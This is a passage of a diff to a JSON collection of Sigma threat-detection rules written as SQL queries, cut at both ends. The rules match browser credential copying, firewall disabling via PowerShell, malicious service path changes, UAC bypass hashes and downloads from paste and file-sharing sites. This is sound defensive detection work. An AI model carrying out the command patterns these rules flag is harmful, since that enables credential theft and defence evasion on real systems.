'8628b2608957a6b0c6330ac3de28ce2e', '8b114550386e31895dfab371e741123d', '94cb940a1a6b65bed4d5a8f849ce9793', '9d68781980370e00e0bd939ee5e6c141', 'b18a1401ff8f444056d29450fbc0a6ce', 'cb567f9498452721d77a451374955f5f', '730073214094cd328547bf1f72289752', '17b461a082950fc6332228572138b80c', 'dc25ee78e2ef4d36faa0badf1e7461c9', '819b19d53ca6736448f9325a85736792', '829da329ce140d873b4a8bde2cbfaa7e', 'c547f2e66061a8dffb6f5a3ff63c0a74', '0588081ab0e63ba785938467e1b10cca', '0d9ec08bac6c07d9987dfd0f1506587c', 'bc129092b71c89b4d4c8cdf8ea590b29', '4da924cf622d039d58bce71cdf05d242', 'e7a3a5c377e2d29324093377d7db1c66', '9a9dbec5c62f0380b4fa5fd31deffedf', 'af8a3976ad71e5d5fdfb67ddb8dadfce', '0c477898bbf137bbd6f2a54e3b805ff4', '0ca9f02b537bcea20d4ea5eb1a9fe338', '3ab3655e5a14d4eefc547f4781bf7f9e', 'e6f9d5152da699934b30daab206471f6', '3ad59991ccf1d67339b319b15a41b35d', 'ffdd59e0318b85a3e480874d9796d872', '0cf479628d7cc1ea25ec7998a92f5051', '07a2d4dcbd6cb2c6a45e6b101f0b6d51', 'd6d0f80386e1380d05cb78e871bc72b1', '38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650', 'ada161bf41b8e5e9132858cb54cab5fb', '2a1bc4913cd5ecb0434df07cb675b798', '11083e75553baae21dc89ce8f9a195e4', 'a23d29c9e566f2fa8ffbb79267f5df80', '4a07f944a83e8a7c2525efa35dd30e2f', '767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b', 'a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2', '32089b8851bbf8bc2d014e9f37288c83', '09D278F9DE118EF09163C6140255C690', '03866661686829d806989e2fc5a72606', 'e57401fbdadcd4571ff385ab82bd5d6d', '84B763C45C0E4A3E7CA5548C710DB4EE', '19584675d94829987952432e018d5056', '330768a4f172e10acb6287b87289d83b', '885c99ccfbe77d1cbfcb9c4e7c1a3313', '22a22bc9e4e0d2f189f1ea01748816ac', '7fa30e6bb7e8e8a69155636e50bf1b28') OR (Hash LIKE '%IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3A19059BD7688CB88E70005F18EFC439%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=bf6223a49e45d99094406777eb6004ba%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4C1B52A19748428E51B14C278D0F58E3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=672B13F4A0B6F27D29065123FE882DFC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9528A0E91E28FBB88AD433FEABCA2456%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=D21BBC50DCC169D7B4D0F01962793154%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=F9A28C458284584A93B14216308D31BD%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6118619783FC175BC7EBECFF0769B46E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=563233BFA169ACC7892451F71AD5850A%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=87575CB7A0E0700EB37F2E3668671A08%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=13F08707F759AF6003837A150A371BA1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=1781F06048A7E58B323F0B9259BE798B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=713C29B396B907ED71A72482759ED757%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=8B114550386E31895DFAB371E741123D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9D68781980370E00E0BD939EE5E6C141%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=B18A1401FF8F444056D29450FBC0A6CE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=CB567F9498452721D77A451374955F5F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=730073214094CD328547BF1F72289752%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=17B461A082950FC6332228572138B80C%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=819B19D53CA6736448F9325A85736792%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0588081AB0E63BA785938467E1B10CCA%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4DA924CF622D039D58BCE71CDF05D242%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E7A3A5C377E2D29324093377D7DB1C66%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E6F9D5152DA699934B30DAAB206471F6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3AD59991CCF1D67339B319B15A41B35D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=FFDD59E0318B85A3E480874D9796D872%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0CF479628D7CC1EA25EC7998A92F5051%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=D6D0F80386E1380D05CB78E871BC72B1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=38D9E015591BBFD4929E0D0F47FA0055%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0E2216679CA6E1094D63322E3412D650%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=11083E75553BAAE21DC89CE8F9A195E4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E96A73C7BF33A464C510EDE582318BF2%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=32089B8851BBF8BC2D014E9F37288C83%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=03866661686829d806989e2fc5a72606%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=19584675D94829987952432E018D5056%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=885C99CCFBE77D1CBFCB9C4E7C1A3313%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=22A22BC9E4E0D2F189F1EA01748816AC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=7FA30E6BB7E8E8A69155636E50BF1B28%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_icmluautil.yml" + "filename": "create_stream_hash_hacktool_download.yml" }, { - "title": "Suspicious Service Path Modification", - "id": "138d3531-8793-4f50-a2cd-f291b2863d78", - "status": "test", - "description": "Detects service path modification via the \"sc\" binary to a suspicious command or path", - "author": "Victor Sergeev, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "title": "Creation Of a Suspicious ADS File Outside a Browser Download", + "id": "573df571-a223-43bc-846e-3f98da481eca", + "status": "experimental", + "description": "Detects the creation of a suspicious ADS (Alternate Data Stream) file by software other than browsers", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" + "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Other legitimate browsers not currently included in the filter (please add them)", + "Legitimate downloads via scripting or command-line tools (Investigate to determine if it's legitimate)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%binPath%' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%cmd %' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%svchost%' ESCAPE '\\' OR CommandLine LIKE '%dllhost%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((Contents LIKE '[ZoneTransfer] ZoneId=3%' ESCAPE '\\' AND TargetFilename LIKE '%:Zone.Identifier' ESCAPE '\\' AND (TargetFilename LIKE '%.exe%' ESCAPE '\\' OR TargetFilename LIKE '%.scr%' ESCAPE '\\' OR TargetFilename LIKE '%.bat%' ESCAPE '\\' OR TargetFilename LIKE '%.cmd%' ESCAPE '\\' OR TargetFilename LIKE '%.docx%' ESCAPE '\\' OR TargetFilename LIKE '%.hta%' ESCAPE '\\' OR TargetFilename LIKE '%.jse%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk%' ESCAPE '\\' OR TargetFilename LIKE '%.pptx%' ESCAPE '\\' OR TargetFilename LIKE '%.ps%' ESCAPE '\\' OR TargetFilename LIKE '%.reg%' ESCAPE '\\' OR TargetFilename LIKE '%.sct%' ESCAPE '\\' OR TargetFilename LIKE '%.vb%' ESCAPE '\\' OR TargetFilename LIKE '%.wsc%' ESCAPE '\\' OR TargetFilename LIKE '%.wsf%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx%' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\brave.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\maxthon.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WindowsApps\\\\MicrosoftEdge.exe' ESCAPE '\\' OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\safari.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\seamonkey.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\whale.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sc_service_path_modification.yml" + "filename": "create_stream_hash_creation_internet_file.yml" }, { - "title": "Potential Browser Data Stealing", - "id": "47147b5b-9e17-4d76-b8d2-7bac24c5ce1b", + "title": "Potential Suspicious Winget Package Installation", + "id": "a3f5c081-e75b-43a0-9f5b-51f26fe5dba2", "status": "experimental", - "description": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser.\nWeb browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future.\nWeb browsers typically store the credentials in an encrypted format within a credential store.\n", + "description": "Detects potential suspicious winget package installation from a suspicious source.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1555.003" + "attack.defense_evasion", + "attack.persistence" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%copy-item%' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%cpi %' ESCAPE '\\' OR CommandLine LIKE '% cp %' ESCAPE '\\' OR CommandLine LIKE '%move %' ESCAPE '\\' OR CommandLine LIKE '%move-item%' ESCAPE '\\' OR CommandLine LIKE '% mi %' ESCAPE '\\' OR CommandLine LIKE '% mv %' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\xcopy.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\robocopy.exe' ESCAPE '\\') OR OriginalFileName IN ('XCOPY.EXE', 'robocopy.exe')) AND (CommandLine LIKE '%\\\\Opera Software\\\\Opera Stable\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Mozilla\\\\Firefox\\\\Profiles%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Edge\\\\User Data\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Google\\\\Chrome\\\\User Data\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Contents LIKE '[ZoneTransfer] ZoneId=3%' ESCAPE '\\' AND (Contents LIKE '%://1%' ESCAPE '\\' OR Contents LIKE '%://2%' ESCAPE '\\' OR Contents LIKE '%://3%' ESCAPE '\\' OR Contents LIKE '%://4%' ESCAPE '\\' OR Contents LIKE '%://5%' ESCAPE '\\' OR Contents LIKE '%://6%' ESCAPE '\\' OR Contents LIKE '%://7%' ESCAPE '\\' OR Contents LIKE '%://8%' ESCAPE '\\' OR Contents LIKE '%://9%' ESCAPE '\\') AND TargetFilename LIKE '%:Zone.Identifier' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\WinGet\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_copy_browser_data.yml" + "filename": "create_stream_hash_winget_susp_package_source.yml" }, { - "title": "Windows Firewall Disabled via PowerShell", - "id": "12f6b752-042d-483e-bf9c-915a6d06ad75", + "title": "Suspicious File Download From File Sharing Websites", + "id": "52182dfb-afb7-41db-b4bc-5336cb29b464", "status": "experimental", - "description": "Detects attempts to disable the Windows Firewall using PowerShell", - "author": "Tim Rauch", + "description": "Detects the download of suspicious file type from a well-known file and paste sharing domain", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562" + "attack.s0139", + "attack.t1564.004" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Set-NetFirewallProfile %' ESCAPE '\\' AND CommandLine LIKE '% -Enabled %' ESCAPE '\\' AND CommandLine LIKE '% False%' ESCAPE '\\') AND (CommandLine LIKE '% -All %' ESCAPE '\\' OR CommandLine LIKE '%Public%' ESCAPE '\\' OR CommandLine LIKE '%Domain%' ESCAPE '\\' OR CommandLine LIKE '%Private%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((Contents LIKE '%https://transfer.sh/%' ESCAPE '\\' OR Contents LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%pastebin.com%' ESCAPE '\\' OR Contents LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Contents LIKE '%mediafire.com%' ESCAPE '\\' OR Contents LIKE '%mega.nz%' ESCAPE '\\' OR Contents LIKE '%ddns.net%' ESCAPE '\\' OR Contents LIKE '%.paste.ee%' ESCAPE '\\' OR Contents LIKE '%.hastebin.com%' ESCAPE '\\' OR Contents LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Contents LIKE '%ufile.io%' ESCAPE '\\' OR Contents LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Contents LIKE '%anonfiles.com%' ESCAPE '\\' OR Contents LIKE '%send.exploit.in%' ESCAPE '\\' OR Contents LIKE '%privatlab.net%' ESCAPE '\\' OR Contents LIKE '%privatlab.com%' ESCAPE '\\' OR Contents LIKE '%sendspace.com%' ESCAPE '\\' OR Contents LIKE '%pastetext.net%' ESCAPE '\\' OR Contents LIKE '%pastebin.pl%' ESCAPE '\\' OR Contents LIKE '%paste.ee%' ESCAPE '\\') AND (TargetFilename LIKE '%.exe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbs:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.one:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.hta:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cpl:Zone%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_disable_firewall.yml" + "filename": "create_stream_hash_file_sharing_domains_download_susp_extension.yml" }, { - "title": "Code Execution via Pcwutl.dll", - "id": "9386d78a-7207-4048-9c9f-a93a7c2d1c05", + "title": "Exports Registry Key To an Alternate Data Stream", + "id": "0d7a9363-af70-4e7b-a3b7-1a176b7fbe84", "status": "test", - "description": "Detects launch of executable by calling the LaunchApplication function from pcwutl.dll library.", - "author": "Julia Fomina, oscd.community", + "description": "Exports the target Registry key and hides it in the specified alternate data stream.", + "author": "Oddvar Moe, Sander Wiebing, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1218.011" + "attack.t1564.004" ], "falsepositives": [ - "Use of Program Compatibility Troubleshooter Helper" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%pcwutl%' ESCAPE '\\' AND CommandLine LIKE '%LaunchApplication%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\'" ], - "filename": "proc_creation_win_lolbin_pcwutl.yml" + "filename": "create_stream_hash_regedit_export_to_ads.yml" }, { - "title": "Suspicious Splwow64 Without Params", - "id": "1f1a8509-2cbb-44f5-8751-8e1571518ce2", - "status": "test", - "description": "Detects suspicious Splwow64.exe process without any command line parameters", + "title": "Unusual File Download From File Sharing Websites", + "id": "ae02ed70-11aa-4a22-b397-c0d0e8f6ea99", + "status": "experimental", + "description": "Detects the download of suspicious file type from a well-known file and paste sharing domain", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.s0139", + "attack.t1564.004" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\splwow64.exe' ESCAPE '\\' AND CommandLine LIKE '%splwow64.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((Contents LIKE '%transfer.sh%' ESCAPE '\\' OR Contents LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%pastebin.com%' ESCAPE '\\' OR Contents LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Contents LIKE '%mediafire.com%' ESCAPE '\\' OR Contents LIKE '%mega.nz%' ESCAPE '\\' OR Contents LIKE '%ddns.net%' ESCAPE '\\' OR Contents LIKE '%.paste.ee%' ESCAPE '\\' OR Contents LIKE '%.hastebin.com%' ESCAPE '\\' OR Contents LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Contents LIKE '%ufile.io%' ESCAPE '\\' OR Contents LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Contents LIKE '%anonfiles.com%' ESCAPE '\\' OR Contents LIKE '%send.exploit.in%' ESCAPE '\\' OR Contents LIKE '%privatlab.net%' ESCAPE '\\' OR Contents LIKE '%privatlab.com%' ESCAPE '\\' OR Contents LIKE '%sendspace.com%' ESCAPE '\\' OR Contents LIKE '%pastetext.net%' ESCAPE '\\' OR Contents LIKE '%pastebin.pl%' ESCAPE '\\' OR Contents LIKE '%paste.ee%' ESCAPE '\\') AND (TargetFilename LIKE '%.ps1:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.bat:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cmd:Zone%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_splwow64_cli_anomaly.yml" + "filename": "create_stream_hash_file_sharing_domains_download_unusual_extension.yml" }, { - "title": "SOURGUM Actor Behaviours", - "id": "7ba08e95-1e0b-40cd-9db5-b980555e42fd", - "status": "test", - "description": "Suspicious behaviours related to an actor tracked by Microsoft as SOURGUM", - "author": "MSTIC, FPT.EagleEye", + "title": "Unusual File Download from Direct IP Address", + "id": "025bd229-fd1f-4fdb-97ab-20006e1a5368", + "status": "experimental", + "description": "Detects the download of suspicious file type from URLs with IP", + "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.t1546", - "attack.t1546.015", - "attack.persistence", - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%windows\\\\system32\\\\Physmem.sys%' ESCAPE '\\' OR NewProcessName LIKE '%Windows\\\\system32\\\\ime\\\\SHARED\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR NewProcessName LIKE '%Windows\\\\system32\\\\ime\\\\IMEJP\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR NewProcessName LIKE '%Windows\\\\system32\\\\ime\\\\IMETC\\\\WimBootConfigurations.ini%' ESCAPE '\\') OR ((NewProcessName LIKE '%windows\\\\system32\\\\filepath2%' ESCAPE '\\' OR NewProcessName LIKE '%windows\\\\system32\\\\ime%' ESCAPE '\\') AND CommandLine LIKE '%reg add%' ESCAPE '\\' AND (CommandLine LIKE '%HKEY\\_LOCAL\\_MACHINE\\\\software\\\\classes\\\\clsid\\\\{7c857801-7381-11cf-884d-00aa004b2e24}\\\\inprocserver32%' ESCAPE '\\' OR CommandLine LIKE '%HKEY\\_LOCAL\\_MACHINE\\\\software\\\\classes\\\\clsid\\\\{cf4cc405-e2c5-4ddd-b3ce-5e7582d8c9fa}\\\\inprocserver32%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Contents REGEXP 